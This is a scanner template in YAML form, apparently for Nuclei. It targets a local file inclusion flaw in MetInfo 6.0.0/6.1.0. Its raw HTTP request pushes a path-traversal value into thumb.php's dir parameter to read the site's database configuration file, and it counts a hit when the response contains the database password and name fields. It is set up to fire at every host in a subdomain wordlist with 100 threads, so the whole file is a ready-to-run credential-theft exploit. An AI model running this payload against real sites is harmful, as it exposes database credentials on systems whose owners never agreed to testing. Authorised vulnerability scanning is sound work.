id: metinfo-lfi 3
info:
  name: MetInfo 6.0.0/6.1.0 LFI
  author: pikpikcu
  severity: high
  reference: https://paper.seebug.org/676/
  tags: metinfo,lfi

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /include/thumb.php?dir=http\\..\\..\\config\\config_db.php HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "con_db_pass"
          - "con_db_name"
        part: body
        condition: and
      - type: status
        status:
          - 200
